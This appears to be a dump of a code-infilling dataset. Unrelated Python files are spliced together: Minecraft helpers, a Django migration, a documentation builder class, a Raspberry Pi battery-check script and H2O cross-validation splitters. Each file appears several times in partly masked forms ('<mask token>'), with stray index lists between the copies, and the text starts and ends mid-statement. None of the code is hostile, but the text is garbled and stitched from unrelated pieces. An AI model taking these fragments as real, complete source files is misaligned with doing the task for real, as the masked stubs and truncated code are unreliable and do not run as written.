return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
def _manhattan(pos1, pos2):
"""Return the manhattan distance. pos1 and pos2 should be iterable."""
return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))
@singleton
def _get_mc():
"""Return the Minecraft instance."""
return minecraft.Minecraft.create()
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| [
48,
54,
69,
73,
79
] |
3 | 45969b346d6d5cbdef2f5d2f74270cf12024072d | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('search', '0003_auto_20230209_1441')]
operations = [migrations.CreateModel(name='SearchSettings', fields=[(
'id', models.AutoField(auto_created=True, primary_key=True,
serialize=False, verbose_name='ID'))], options={'permissions': ((
'change_boost', 'Edit boost settings for search components'), (
'view_explore', 'View the global search explore page')), 'managed':
False, 'default_permissions': ()})]
| from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('search', '0003_auto_20230209_1441')]
operations = [migrations.CreateModel(name='SearchSettings', fields=[(
'id', models.AutoField(auto_created=True, primary_key=True,
serialize=False, verbose_name='ID'))], options={'permissions': ((
'change_boost', 'Edit boost settings for search components'), (
'view_explore', 'View the global search explore page')), 'managed':
False, 'default_permissions': ()})]
| # Generated by Django 4.1.9 on 2023-06-29 16:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("search", "0003_auto_20230209_1441"),
]
operations = [
migrations.CreateModel(
name="SearchSettings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
],
options={
"permissions": (
("change_boost", "Edit boost settings for search components"),
("view_explore", "View the global search explore page"),
),
"managed": False,
"default_permissions": (),
},
),
]
| [
0,
1,
2,
3,
4
] |
4 | 3fbf1768a2fe78df591c49490dfce5fb374e7fc2 | from functools import wraps
import os
def restoring_chdir(fn):
#XXX:dc: This would be better off in a neutral module
@wraps(fn)
def decorator(*args, **kw):
try:
path = os.getcwd()
return fn(*args, **kw)
finally:
os.chdir(path)
return decorator
class BaseBuilder(object):
"""
The Base for all Builders. Defines the API for subclasses.
All workflow steps need to return true, otherwise it is assumed something
went wrong and the Builder will stop
"""
workflow = ['clean', 'build', 'move']
def __init__(self, version):
self.version = version
def run(self):
for step in self.workflow:
fn = getattr(self, step)
result = fn()
assert result
@restoring_chdir
def force(self):
"""
An optional step to force a build even when nothing has changed.
"""
print "Forcing a build by touching files"
os.chdir(self.version.project.conf_dir(self.version.slug))
os.system('touch * && touch */*')
def clean(self):
"""
Clean up the version so it's ready for usage.
This is used to add RTD specific stuff to Sphinx, and to
implement whitelists on projects as well.
It is guaranteed to be called before your project is built.
"""
raise NotImplementedError
def build(self):
"""
Do the actual building of the documentation.
"""
raise NotImplementedError
def move(self):
"""
Move the documentation from it's generated place to its final home.
This needs to understand both a single server dev environment,
as well as a multi-server environment.
"""
raise NotImplementedError
@property
def changed(self):
"""
Says whether the documentation has changed, and requires further action.
This is mainly used to short-circuit more expensive builds of other
output formats if the project docs didn't change on an update.
Subclasses are recommended to override for more efficient builds.
Defaults to `True`
"""
return True
| null | null | null | null | [
0
] |
5 | 67b967b688aeac1270eee836e0f6e6b3555b933e | <mask token>
| <mask token>
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
print('tout va bien dormez braves gens')
| <mask token>
pidcmes = Pidcmes()
u_bat_min = 3.7
n_moy = 20
stop_run = False
u_avg = pidcmes.get_tension(n_moy)
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
print('tout va bien dormez braves gens')
| <mask token>
import time
import datetime as dt
from subprocess import call
from pidcmes_lib import Pidcmes
pidcmes = Pidcmes()
u_bat_min = 3.7
n_moy = 20
stop_run = False
u_avg = pidcmes.get_tension(n_moy)
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
print('tout va bien dormez braves gens')
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This program is run at regular intervals to check the battery charge status of the uninterruptible power supply.
In our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the
Raspberry PI shutdown procedure at 3.7 V,we ensure that the processor has enough time to make a clean shutdown.
This program must be launched at regular intervals (5 inute in our case) by the Raspberry PI OS cron task scheduler.
The crontab -e command in the home directory opens the cron file and the command line would for example be for a trigger every 5 minutes:
5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py
"""
import time
import datetime as dt
from subprocess import call
from pidcmes_lib import Pidcmes # class for 'pidcmes' procedures
pidcmes = Pidcmes() # initialize pidcmese class
u_bat_min = 3.7 # minumum battery voltage
n_moy = 20 # averaging to reduce glitches
stop_run = False # to control the execution (run/stop)
u_avg = pidcmes.get_tension(n_moy) # read the value in volts
if u_avg < u_bat_min:# or i > 10:
print("proper shut down of the machine due to low battery")
# time.sleep(5)
# call("sudo shutdown -h now", shell=True) # shutdown the RASPI
else:
print("tout va bien dormez braves gens")
| [
0,
1,
2,
3,
4
] |
6 | c59707ba07c1659d94684c54cdd7bb2658cba935 | <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
<mask token>
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
<mask token>
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
<mask token>
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
<mask token>
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
